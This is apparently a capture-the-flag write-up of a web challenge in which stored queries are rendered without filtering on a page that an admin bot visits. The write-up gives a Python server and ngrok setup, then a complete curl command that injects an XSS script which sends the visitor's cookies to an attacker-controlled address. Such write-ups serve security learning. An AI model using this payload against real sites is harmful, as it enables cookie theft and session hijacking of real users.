Untitled

No much information available on the website because it just showing some of animation.

Untitled

It had downloadable file, let's analyze it.

Untitled

We got two endpoints there. /api/submit are used for adding new query. then /queries are used to show up all queries from databases but it can only be accessed from localhost only.

it also had a bot that visit /queries page with cookie that we need to stole since we can see the flag there.

Untitled

Now let's take a look on /queries page

Untitled

The queries page just show up all queries from database and it didn't have filterization and stuff, so we can inject xss and stole the admin cookie.

First, we need to start up http server. I use python and then forward the port with ngrok since the website are using public ip and i didn't have it.

#Terminal 1
python3 -m http.server 80

#Terminal 2
ngrok http 80

#Terminal 3
curl -X POST <http://Target-IP>:Target-Port/api/submit -H "Content-Type: application/json" --data-raw '{"query" : "<script>const cookie = document.cookie; const xhttp = new XMLHttpRequest(); xhttp.open(\\"GET\\", `Your-Ngrok-Address?cookie=${cookie}`, true); xhttp.send();</script>"}'

Untitled